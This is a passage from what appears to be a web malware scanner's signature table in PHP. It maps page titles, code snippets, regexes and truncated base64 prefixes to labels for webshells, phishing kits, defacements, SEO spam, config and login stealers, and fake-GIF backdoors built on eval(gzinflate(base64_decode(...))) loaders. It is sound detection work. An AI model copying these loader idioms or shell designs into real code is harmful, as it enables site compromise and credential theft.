	'ESTE SITIO A SIDO HACKEADO by [YEI ZETA]' => array(STR_CLEARFILE, 'html.defaced.generic.051', NULL),
	'ESTE SITIO ESTA EN NUESTRAS MANOS.' => array(STR_CLEARFILE, 'html.defaced.generic.051.001', NULL),
	'"Cyberpunks Hackers 2007' => array(STR_CLEARFILE, 'html.defaced.cyberpunkshackers.001', NULL),
	'<title>Moroccan Attacker' => array(STR_CLEARFILE, 'html.defaced.generic.054', NULL),
	'<title>OP Payback' => array(STR_CLEARFILE, 'html.defaced.generic.060', NULL),
	'<title>K4RDAN4DAM' => array(STR_CLEARFILE, 'html.defaced.generic.062', NULL),
	'<title>0wn3d ' => array(STR_CLEARFILE, 'html.defaced.generic.074', NULL),
	'[+] Indonesian Defacer Newbie' => array(STR_CLEARFILE,'html.defaced.generic.067', NULL),
	'Arabia Hackers<' => array(STR_CLEARFILE,'html.defaced.generic.068', NULL),
	'>ACCESO DENEGADO, DESFACEADA' => array(STR_CLEARFILE,'html.defaced.generic.073', NULL),
	'>./Albanian Attackers<' => array(STR_CLEARFILE,'html.defaced.generic.075', NULL),
	'>./DeFaceD<' => array(STR_CLEARFILE,'html.defaced.generic.075.02', NULL),
	'<title>[!] STAMPED BY' => array(STR_CLEARFILE, 'html.defaced.generic.076', NULL),
	'>.: ! Owned' => array(STR_CLEARFILE, 'html.defaced.generic.079', NULL),
	'/AzerbaijanDefacersGroup/"' => array(STR_CLEARFILE, 'html.defaced.generic.080', NULL),
	'>[!] Own3d' => array(STR_CLEARFILE, 'html.defaced.generic.081', NULL),
	'>Pawned By' => array(STR_CLEARFILE, 'html.defaced.generic.082', NULL),
	'<title>F.B.S!' => array(STR_CLEARFILE, 'html.defaced.generic.084', NULL),
	'>Anniversary Cinta :*<' => array(STR_CLEARFILE, 'html.defaced.generic.086', NULL),
	'<title>Lamer-ID' => array(STR_CLEARFILE, 'php.defaced.generic.004', NULL),
	'| Indonesia Cyber Army' => array(STR_CLEARFILE, 'html.defaced.indonesia.001', NULL),
	'<title>SYSTEM LEMAH' => array(STR_CLEARFILE, 'html.defaced.indonesia.002', NULL),
	'<title>You Lose' => array(STR_CLEARFILE, 'html.defaced.generic.091', NULL),
	'<title>.::[+] Defaced' => array(STR_CLEARFILE, 'html.defaced.generic.092', NULL),
	'<title>0xfans' => array(STR_CLEARFILE, 'html.defaced.0xfans.001', NULL),
	'l0s4r' => array(STR_CLEARFILE, 'html.defaced.l0s4r.001', NULL),
	'<title>Monkey B Luffy' => array(STR_CLEARFILE, 'html.defaced.monkeybluffy.001', NULL),
	'<title>T1KUS90T' => array(STR_CLEARFILE, 'php.defaced.T1KUS90T.001', NULL),
	'<title>Admin Finder' => array(STR_CLEARFILE, 'php.hacktool.admin_page_finder.002', NULL),
	'Hacker Rulez' => array(STR_CLEARFILE, 'html.defaced.generic.093', NULL),
	'<title>nobody - exploit' => array(STR_CLEARFILE, 'php.hacktool.dumper.001', NULL),
	'<title>Pastebin.com - Page Removed' => array(STR_CLEARFILE, 'html.defaced.expiredpastebin.001', NULL),
	'<title>Indonesia To World Team' => array(STR_CLEARFILE, 'html.defaced.indonesia.003', NULL),
	'<title>Zikter Here' => array(STR_CLEARFILE, 'html.defaced.generic.108', NULL),
	'<title>BLACK ILLUSION SECURITY' => array(STR_CLEARFILE, 'html.defaced.generic.114', NULL),
	'>Paypal Valid Mail Checker' => array(STR_CLEARFILE, 'html.phishing.paypal.014', NULL),
	'<title><?php echo $pass != "" ? $pass : "" ?> - &#37038;&#31665;&#39564;&#35777;' => array(STR_CLEARFILE, 'php.phishing.generic.044', NULL),
	'>Egyptian Information Security Team' => array(STR_CLEARFILE, 'html.defaced.generic.122', NULL),
	'<title>IndonesianPeople!' => array(STR_CLEARFILE, 'html.defaced.indonesia.005', NULL),
	'Hitler007' => array(STR_CLEARFILE, 'html.defaced.BFA.001.02',NULL),
	'Unknown Indonesian H4xx0r' => array(STR_CLEARFILE, 'php.backdoor.webshell.001.001', NULL),
	'<title>[BKEYWORD]</title>' => array(STR_CLEARFILE, 'html.spam-seo.bkeyword.001', NULL),
	'DOSER SCRIPT' => array(STR_CLEARFILE, 'php.hacktool.doserscript.001', NULL),
	'<title>jsys.php</title>' => array(STR_CLEARFILE, 'php.backdoor.jsys.001', NULL),
	'class JSYS_Utils' => array(STR_CLEARFILE, 'php.backdoor.jsys.002', NULL),
	'<title>lama\'s\'hell' => array(STR_CLEARFILE, 'php.backdoor.webshell.094', NULL),
	'<title>|[NTDaddy' => array(STR_CLEARFILE, 'asp.backdoor.uploader.008', NULL),
	'<title>:: AventGrup ::.. - Sincap' => array(STR_CLEARFILE, 'php.backdoor.webshell.095', NULL),
	'<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>' => array(STR_CLEARFILE, 'asp.backdoor.uploader.009', NULL),
	'<title>Aventis KlasVayv' => array(STR_CLEARFILE, 'asp.backdoor.uploader.010', NULL),
	'<title>Outbox priv8 version' => array(STR_CLEARFILE, 'php.hacktool.mailer.071', NULL),
	'<title>p0r7s</title>' => array(STR_CLEARFILE, 'html.defaced.generic.135', NULL),
	'<title>Remote Explorer</title>' => array(STR_CLEARFILE, 'asp.backdoor.uploader.012', NULL),
	'$xia = \'<a href="\' . $pathurl . $preFix . $midFix . $nextUrl . $sufFix' => array(STR_CLEARFILE,'php.spam-seo.doorway_downloader.007', NULL),
	'<title>@del</title>' => array(STR_CLEARFILE, 'php.hacktool.mass-delete.001', NULL),
	'<title>!LOG VIEW!' => array(STR_CLEARFILE, 'html.malware.log_viewer.001', NULL),
	'<title>#Pwned</title>' => array(STR_CLEARFILE, 'html.defaced.generic.102', NULL),
	'<title>Секундочку...</title>' => array(STR_CLEARFILE, 'html.spam-seo.redirect.006', NULL),
	'<title>[cmb.]</title>' => array(STR_CLEARFILE, 'html.spam-seo.redirect.010', NULL),
	'<title>Ow3nd' => array(STR_CLEARFILE, 'html.defaced.generic.099', NULL),
	'<title>[ Fast Deface ]' => array(STR_CLEARFILE, 'html.defaced.generic.101', NULL),
	'<title>[Mister][Spy]' => array(STR_CLEARFILE, 'html.defaced.generic.103', NULL),
	'<title>Form Page: excel</title>' => array(STR_CLEARFILE, 'html.phishing.generic.040', NULL),
	'<title>:: k2ll33d ::</title>' => array(STR_CLEARFILE, 'html.hacktool.generic.002', NULL),
	'<title>Unzip a zip file to the webserver</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.105', NULL),
	'<title>_DOG Of War_</title>' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.082', NULL),
	'<title>-farM-mOn3Y-</title>' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.083', NULL),
	'<title>Pwned By Monkey' => array(STR_CLEARFILE, 'php.backdoor.webshell.130', NULL),
	'<title>Cvar1984</title>' => array(STR_CLEARFILE, 'html.defaced.generic.140', NULL),
	'<title>-=> Qu4t4ck0' => array(STR_CLEARFILE, 'html.defaced.generic.139', NULL),
	'<title>CaZaNoVa' => array(STR_CLEARFILE, 'php.hacktool.mailer.088', NULL),
	'<title>Configs Grabber By Thex@b1' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.013', NULL),
	'Tested by ./cLaw' => array(STR_CLEARFILE, 'html.defaced.generic.095', NULL),
	'Orang Govlog :v' => array(STR_CLEARFILE, 'html.defaced.generic.097', NULL),
	'>p0r7s' => array(STR_CLEARFILE, 'html.defaced.p0r7s.001', NULL),
	'Red-Security Group' => array(STR_CLEARFILE, 'html.defaced.red-security_group.001', NULL),
	'izocin priv9</title>' => array(STR_CLEARFILE, 'php.hacktool.litespeed_bypass.001.02', NULL),
	'<title>Free Gaza' => array(STR_CLEARFILE, 'html.defaced.generic.144', NULL),
	'Devil Security Crew<' => array(STR_CLEARFILE, 'html.defaced.devil_security_crew.001', NULL),
	'<title>JemROOT' => array(STR_CLEARFILE, 'html.defaced.jemroot.001', NULL),
	'href="http://www.MadLeets.com">' => array(STR_CLEARFILE, 'html.defaced.madleets.001', NULL),
	'>Dear Admin your Website' => array(STR_CLEARFILE, 'html.defaced.generic.146', NULL),
	'<img class="logo" role="presentation" pngsrc="files/microsoft_logo.png?x=' => array(STR_CLEARFILE, 'html.phishing.microsoft.015', NULL),
	'<title>WhatsApp  —  $Title' => array(STR_CLEARFILE, 'php.phishing.whatsapp.002', NULL),
	'search replace db</title>' => array(STR_CLEARFILE, 'php.hacktool.database-manager.003', NULL),
	'<title>Sp4mp3d By' => array(STR_CLEARFILE, 'html.defaced.sp4mp3d.001', NULL),
	'<title>Pwnd by' => array(STR_CLEARFILE, 'html.defaced.pwnd_by.001', NULL),
	'rk Ordusu</title>' => array(STR_CLEARFILE, 'html.defaced.gokturk_ordusu.001', NULL),
	'INDONESIAN DEFACER' => array(STR_CLEARFILE, 'html.defaced.indonesia.007', NULL),
	'Virus and Trojan</title>' => array(STR_CLEARFILE, 'html.defaced.generic.147', NULL),
	'<title>Anka Neferler Tim' => array(STR_CLEARFILE, 'html.defaced.TurkHackTeam.002', NULL),
	'by LolzSec<' => array(STR_CLEARFILE, 'html.defaced.lolzsec.001', NULL),
	'>H4CK3R N4O U5A' => array(STR_CLEARFILE, 'html.defaced.generic.148', NULL),
	'This is a notice of <a href="https://en.wikipedia.org/wiki/Ransomware">ransomware</a>' => array(STR_STOP, 'php.hacktool.ransomware.004', NULL),
	'if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =' => array(STR_CLEARFILE, 'php.spam-seo.generic.044', NULL),
	'<script> window.location.href=\'https://mgcp.bet/register?intr=' => array(STR_CLEARFILE, 'js.spam-seo.redirect.047', NULL),
	'<title>Login - Dropbox' => array(STR_CLEARFILE, 'html.phishing.dropbox.010', NULL),
	'<title>AOL Sign In' => array(STR_CLEARFILE, 'html.phishing.aol.004', NULL),
	'<title>Yahoo - Login' => array(STR_CLEARFILE, 'html.phishing.yahoo.015', NULL),
	'<title>Gmail Sign' => array(STR_CLEARFILE, 'html.phishing.gmail.002', NULL),
	'<title>[^<]{0,200}?[Ee3][Xx][Pp][Ll1][Oo0][Ii1][Tt][^aA][^<]{0,200}?<\/title>' => array(REX_CLEARFILE, 'rex.exploit_title.001', NULL),
	'ALPHRA87' => array(STR_CLEARFILE, 'html.defaced.generic.153', NULL),
	'Khazekira AR' => array(STR_CLEARFILE, 'html.defaced.generic.154', NULL),
	'Uploader By ATTARI' => array(STR_CLEARFILE, 'php.defaced.generic.015', NULL),
	'<title>PacmanCorp' => array(STR_CLEARFILE, 'html.defaced.generic.155', NULL),
	'Ayyıldız Tim' => array(STR_CLEARFILE, 'html.defaced.generic.156', NULL),
	'>Your site has been locked, all files are locked.' => array(STR_CLEARFILE, 'php.hacktool.generic.021.02', NULL),
	'0wn3d by' => array(STR_CLEARFILE, 'html.defaced.generic.157', NULL),
	'DEFACE BY' => array(STR_CLEARFILE, 'html.defaced.generic.158', NULL),
	'<title>Adobe Document' => array(STR_CLEARFILE, 'html.phishing.adobe.009', NULL),
	'>Verify Computer For' => array(STR_CLEARFILE, 'html.phishing.generic.093', NULL),
	'PRIV8 MA!L3R' => array(STR_CLEARFILE, 'php.hacktool.mailer.137', NULL),
	'OneDrive</title>' => array(STR_CLEARFILE, 'html.phishing.onedrive.004', NULL),
	'Online Banking Login' => array(STR_CLEARFILE, 'html.phishing.generic.094', NULL),
	'>Rooted by' => array(STR_CLEARFILE, 'html.defaced.generic.162', NULL),
	'AYYILDIZ' => array(STR_CLEARFILE, 'html.defaced.generic.161', NULL),
	'<title><?php echo $domain ?> Client' => array(STR_CLEARFILE, 'php.phishing.script.029', NULL),
	'<title>.::: STRONG MAILER' => array(STR_CLEARFILE, 'php.hacktool.mailer.153', NULL),
	'#login-panel #form-header #godaddy-template {' => array(STR_CLEARFILE, 'html.phishing.godaddy.003', NULL),
	'<title>touch by' => array(STR_CLEARFILE, 'html.defaced.generic.164', NULL),
	'<title>Sign in - Webmail Login<' => array(STR_CLEARFILE, 'html.phishing.webmail.005', NULL),
	'Lutfie404' => array(STR_CLEARFILE, 'html.defaced.generic.167', NULL),
	'<title>Xtra Mail' => array(STR_CLEARFILE, 'html.phishing.xtramail.001', NULL),
	'><title>(<?php echo $_SESSION[' => array(STR_CLEARFILE, 'php.phishing.script.034', NULL),
	'<title>CHECKER PAYPAL BY' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.003', NULL),
	'<title>Internet banking' => array(STR_CLEARFILE, 'html.phishing.generic.012', NULL, 1),
	'<title>Internet Banking' => array(STR_CLEARFILE, 'html.phishing.generic.013', NULL, 1),
	'<title>Mini Php Shell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.06', NULL),
	'<title>r57Shell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.07', NULL),
	'<title>PhpShell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.013', NULL),
	'<title>ZoRBaCK Connect</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.027', NULL),
	'<title>ASPX Shell</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.029', NULL),
	'<title>.+- WSO.+</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.030', NULL),
	'<title>Knull Shell</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.036', NULL),
	'<title>:: www.h4ckcity.org :: Coded By 2MzRp & LocalMan ::</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.037', NULL),
	'<title>JSP Shell</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.038', NULL),
	'<title>Stored Procedure Execute</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.048', NULL),
	'<title>SST Sheller !</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.052', NULL),
	'<title>.+Ani-Shell.+</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.056', NULL),
	'<title>awen asp.net webshell</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.059', NULL),
	'<title>SyRiAn Sh3ll ' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.065', NULL),
	'<title>.+NTDaddy.+</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.066', NULL),
	'<title>iTSecTeam</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.067', NULL),
	'<title>PHP-Terminal' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.069', NULL),
	'execute command: <input type="text" name="c">' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.075', NULL),
	'jsp File browser' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.01', NULL),
	'JspSpy' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.05', NULL),
	'Simple CGI backdoor by DK' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.08', NULL),
	'NIX REMOTE WEB-SHELL' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.010', NULL),
	'hackru.info' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.015', NULL),
	'Hmilyld' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.016', NULL),
	'ernealizm' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.019', NULL),
	'C99Shell v' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.020', NULL),
	'xIXRbE' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.021', NULL),
	'MyShell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.022', NULL),
	'fuckjp' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.023', NULL),
	'hkmjj' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.028', NULL),
	'hack520' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.031', NULL),
	'BloodSword' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.032', NULL),
	'lcxMacros' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.034', NULL),
	'JFileMan' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.035', NULL),
	'r57shell</title>' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.039', NULL),
	'jspreverse.html' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.040', NULL),
	'icesword' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.041', NULL),
	'<form method="POST" action="cfexec.cfm">' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.042', NULL),
	'JSP Backdoor Reverse Shell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.043', NULL),
	'REMVIEW TOOLS' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.044', NULL),
	'PHVayv' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.045', NULL),
	'NetworkFileManagerPHP' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.047', NULL),
	'hacker666' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.049', NULL),
	'JSP Backdoor' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.050', NULL),
	'h4ntu' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.051', NULL),
	'www.hmilyld.cn' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.053', NULL),
	'heroes1412' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.054', NULL),
	'safe.yi.org' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.055', NULL),
	'Persiangig' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.057', NULL),
	'404 infiltrate team' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.060', NULL),
	'pwnshell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.061', NULL),
	'PHP Shell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.064', NULL),
	'Cod3rZ' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.074', NULL),
	'Piraeus Bank</title>' => array(STR_CLEARFILE, 'html.phishing.piraeus.001', NULL),
	'<title>winbank web banking' => array(STR_CLEARFILE, 'html.phishing.web_banking.001', NULL),
	'<title>--==[[ Don,Symlink Based Cpanel Cracker By Team IndiShell]]==--</title>' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.025', NULL),
	'<title>SimShell - Simorgh Security MGZ</title>' => array(STR_CLEARFILE, 'php.backdoor.SimShell.001', NULL),
	'<title>:: phpHS :: PHP HVA Shell Script ::' => array(STR_CLEARFILE, 'php.backdoor.hva-shell.001', NULL),
	'<title>Dive Shell - Emperor' => array(STR_CLEARFILE, 'php.backdoor.dive-shell.001', NULL),
	'<title>SHOR7CUT | SIMPLE UPLOAD' => array(STR_CLEARFILE, 'php.backdoor.shor7cut-uploader.001', NULL),
	'<title>Peterson - Shell' => array(STR_CLEARFILE, 'php.backdoor.webshell.123', NULL),
	'<title>Back Connect Shell -- PHP' => array(STR_CLEARFILE, 'php.backdoor.webshell.124', NULL),
	'<title>Cy#b3r00T Shell Uploader' => array(STR_CLEARFILE, 'php.backdoor.webshell.125', NULL),
	'<title>KACAK Shell<' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.010', NULL),
	'Shell Priv8</title>' => array(STR_CLEARFILE,'php.backdoor.priv8.002', NULL),
	'<title>r0b0t ShEll' => array(STR_CLEARFILE, 'php.backdoor.webshell.118', NULL),
	'<title>DX ajax text shell (ATS)' => array(STR_CLEARFILE, 'php.backdoor.webshell.119', NULL),
	'<title>***TuiTui*** SHELL' => array(STR_CLEARFILE, 'php.backdoor.webshell.120', NULL),
	'<title>.:+: ShellAngkangan' => array(STR_CLEARFILE, 'php.backdoor.webshell.121', NULL),
	'<title>.: Shell Killers :.' => array(STR_CLEARFILE, 'php.backdoor.webshell.115', NULL),
	'?> - Web Explorer</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.152', NULL),
	'<title>priv8 cgi shell</title>' => array(STR_CLEARFILE, 'pl.backdoor.priv8.001', NULL),
	'<title>1337w0rm' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.006', NULL),
	'cPanel Cracker</title>' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.006.002', NULL),
	'<title>Proxyshell hide ip' => array(STR_CLEARFILE, 'php.backdoor.webshell.126', NULL),
	'<title>PBT - PHPshell BY TINKLE<' => array(STR_CLEARFILE, 'php.backdoor.webshell.127', NULL),
	'~ Shell I</title>' => array(STR_CLEARFILE, 'php.backdoor.webshell.129', NULL),
	'INDONESIA GALAUERS' => array(STR_CLEARFILE, 'php.hacktool.packer.005', NULL),
	'<!-- form eksekusi command -->' => array(STR_CLEARFILE, 'php.backdoor.arakbali.001', NULL),
	'NoGe S!mPLe SHeLL' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.038', NULL),
	'gimmeyourfuckingtemplate' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.175', 'if\s*\(strpos\(\$_SERVER\[.REQUEST_URI.\],\s*.saveyourfuckingtemplate[^<]+<link[^@]+new THEVirtualPage[^>]+add_filter\(\s*.wp_title[^\}]+\}\s*\}'),
	'>Ihr WEB.DE Konto wurde erfolgreich verifiziert.' => array(STR_CLEARFILE, 'html.phishing.web_de.001', NULL),
	'>WEBDE Login' => array(STR_CLEARFILE, 'html.phishing.web_de.002', NULL),
	'if(strpos($all,"ja")>-1 && (strpos($s_ref,"jp")>0 || strpos($s_ref,"yahoo' => array(STR_CLEARFILE, 'php.spam-seo.injector.333', NULL),
	'WeTransfer Plus' => array(STR_CLEARFILE, 'html.phishing.wetransfer.001', NULL),
	'Rackspace Webmail' => array(STR_CLEARFILE, 'html.phishing.rackspace.001', NULL),
	'Gambrush' => array(STR_CLEARFILE, 'html.defaced.generic.168', NULL),
	'<title>Uploader By rizky07</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.424', NULL),
    '<title>Porn sites list</title>' => array(STR_CLEARFILE, 'php.defaced.generic.017', NULL),
    '<title>Share Point Online</title>' => array(STR_CLEARFILE, 'html.phishing.adobe.013', NULL),
),

'eva' => array(STR_TRIGGER,

	'base64_decode' => array(STR_TRIGGER,

		'gzinflate(base64_decode(' => array(STR_TRIGGER,
	
			'GIF89' => array(STR_TRIGGER,
	
				'GIF89[^<]+<\?' => array(REX_TRIGGER,
					'eval(gz' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.002', NULL),
				),
	
				'@eval(gzinflate(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.003', NULL),
				'eval(stripslashes($_POST[' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.004', NULL),
				'eval(stripslashes(gzinflate(base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.004.02', NULL),
				'))); die; }else{ eval(gzinflate(base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.004.03', NULL),
				'eval(gzinflate(str_rot13(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.008', NULL),
				'md5 Password' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.007', NULL),
				'$sh_id = ' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.007.01', NULL),
				'$str=array($send, $IWP); foreach ($str as $send)' => array(STR_CLEARFILE, 'php.backdoor.fakeGIF.006', NULL),
			),
	

			'class Rst' => array(STR_TRIGGER,
				'const PLATFORM_UNKNOWN' => array(STR_TRIGGER,
					'self::PLATFORM_LINUX' => array(STR_CLEARFILE, 'php.hacktool.emotet_botnet.001', NULL),
				),
			),

			'@error_reporting(0);' => array(STR_TRIGGER,
				'@set_time_limit(0);' => array(STR_TRIGGER,
					'eval(gzinflate(base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.filesman.050', NULL),
				),
			),
	
			'"./wp-admin/css/colors/' => array(STR_TRIGGER,
				'"./wp-links-opml.php",' => array(STR_TRIGGER, 
					'function get_array(' => array(STR_CLEARFILE, 'php.malware.dropper.020', NULL),
				),
			),

			'$auth' => array(STR_TRIGGER,
				'$pass' => array(STR_TRIGGER,
					'define(\'SELF_PATH_TO_UNLINK\', __FILE__);' => array(STR_CLEARFILE, 'php.backdoor.webshell.156', NULL),
				),
			),

			'for($i=0;$i<strlen(' => array(STR_TRIGGER,
				'[$i] = chr(ord(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.chord64.001', '(\$auth_pass\s*=[^;]+[^\$]+)?function\s*(\w+)\((\$\w+)\)[^\}]+\3\s*=\s*gzinflate.base64_decode.\3..;\s*for.\$i=0;\s*\$i<strlen\(\3[^\}]+\3.\$i.\s*=\s*chr.ord.\3\[\$i\]\)\s*-1[^\?>]+(eval\(\2\(.\S+\)\);|return\s*\3;)?'),
			),

			'==(string)$val)' => array(STR_TRIGGER,
				'eval("?>".gzinflate(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.uploader.303', NULL),
			),

			'$x0r = "' => array(STR_TRIGGER,
				'eval(gzinflate(base64_decode($x0r)));' => array(STR_CLEARFILE, 'php.backdoor.WSO.002', NULL),
			),
	
			'$auth_pass' => array(STR_TRIGGER,
				'eval(gzinflate(base64_decode(' => array(STR_CLEARFILE,'php.backdoor.filesman.029.003',NULL, 1),
			),

			'shell' => array(STR_CLEARFILE, 'php.backdoor.generic.045', NULL),
			'Shell' => array(STR_CLEARFILE, 'php.backdoor.generic.045.02', NULL),
			'$admin[\'pass\']' => array(STR_CLEARFILE, 'php.backdoor.generic.045.03', NULL),
			'= (md5($_POST[\'pass\']));' => array(STR_CLEARFILE, 'php.backdoor.generic.045.04', NULL),
			'7Vvrc9pIEv9OqvI/TCbeCLIGAcaPNQifg3Hiil9lO7eVMi5K' => array(STR_CLEARFILE, 'php.backdoor.webshell.179', NULL),
			'CR2vRGkXO2wiIny7FcfO0WOhVkNt62J6Ehxq54dgMgBBr0F0iA' => array(STR_CLEARFILE, 'php.backdoor.webshell.192', NULL),
			'"[\w]{32}";[^\n]+[\s]*function [\w]+[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*gzinflate\(base64_decode' => array(REX_CLEARFILE, 'php.backdoor.webshell.195', NULL),
			'vVVdb9owFH1epPyHizcpoDUJMKqtkKTTtJZVWrVJdE8IVY5jEo8' => array(STR_CLEARFILE, 'php.backdoor.uploader.330', NULL),
			'lZjHDsXKcaYfQE+hhQFfgTCYEzRaHOZMHmZyYBjMOWcO9Oxz7LX' => array(STR_CLEARFILE, 'php.hacktool.mailer.124', NULL),
			'XZFRa8IwFIWfFfwPEQq3BWndujFYdTC3WvcyZtwGW5HQlDSOam2jjabif1' => array(STR_CLEARFILE, 'php.backdoor.uploader.342', NULL),
			'dJvHjsNKlqYfoJ6iFg3MLRANeoeaWtB77zkYDOhFb0Q' => array(STR_CLEARFILE, 'php.backdoor.webshell.205', NULL),
			'wBcfJjvnrV5K7g7PEkt313Dvveae6MwDJZDKZTCYzySR' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.110', NULL),
			'ZZNta9swEMc/gMHf4SYCcmhqZ4wySC23o2z0zdjYCnuRBSPb' => array(STR_CLEARFILE, 'php.hacktool.whm-hack.002', NULL),
			'eval(gzinflate(base64_decode("1X39e9q40ujP3efZ' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.filesman.082', 'eval.gzinflate.base64_decode."1X39e9q40ujP3efZ[^;]+;'),
			'eval(gzinflate(base64_decode(\'rVdtc' => array(STR_CLEAR_LINEMATCH,'php.backdoor.webshell_gen.050','eval.gzinflate.base64_decode..rVdt[^;]*;'),
			'.\'538VZ9L/Vb3NWPbJXvyVJltBYP+XF9mUF3/9+19i3KD8ZkfCJyRBVz6r6vO6mSaJ\'' => array(STR_CLEARFILE, 'php.backdoor.filesman.028', NULL),
			'eval(gzinflate(base64_decode("BcFJkqowAA' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.016', 'eval.gzinflate.base64_decode..BcFJkqowAAD[^>]+P4H"...;'),
			'eval(gzinflate(base64_decode(\'pVj' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.redirect.003','eval.gzinflate.base64_decode..pVj[^;]+;'),
			'eval(gzinflate(base64_decode(\'rRhrc5' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.redirect.003.04','eval.gzinflate.base64_decode..rRhrc5[^;]+;'),
			'eval(gzinflate(base64_decode(\'VY9Ra8IwEMff' => array(STR_CLEAR_LINEMATCH, 'php.malware.login-stealer.003', 'eval.gzinflate.base64_decode..VY9Ra8IwEMff[^;]+;'),
			'eval(gzinflate(base64_decode(\'VY/dasJAEIXv' => array(STR_CLEAR_LINEMATCH, 'php.malware.login-stealer.003.02', 'eval.gzinflate.base64_decode..VY\/dasJAEIXv[^;]+;'),
			'eval(gzinflate(base64_decode("VZBvS8MwEMbf' => array(STR_CLEAR_LINEMATCH, 'php.malware.login-stealer.003.03', 'eval.gzinflate.base64_decode..VZBvS8MwEMbf[^;]+;'),
			'eval(gzinflate(base64_decode("rZrHCvTceqXnDb6H5' => array(STR_CLEARFILE, 'php.backdoor.webshell.077', NULL),
			'eval(gzinflate(base64_decode(\'5b39dxq3EjD8c+' => array(STR_CLEARFILE, 'php.backdoor.filesman.049', NULL),
			'eval(gzinflate(base64_decode(\'hZFha8IwEIa/C/6HEgQ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.090', 'eval.gzinflate.base64_decode..hZFha8IwEIa[^\)]+\)\)\);'),
			'eval(gzinflate(base64_decode(\'y0zTyCwuTi3RUIkPcg0MdQ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.018', 'eval.gzinflate.base64_decode..y0zTyCwuTi3RUIkPcg0MdQ[^)]+\)\)\);'),
			'eval(gzinflate(base64_decode(\'FZnHjoRYEkX3/SPTLRaQeDS' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.009', NULL),
			'eval(gzinflate(base64_decode("rbpHj4Rss6a5Lyn' => array(STR_CLEARFILE, 'php.backdoor.webshell.077.02', NULL),
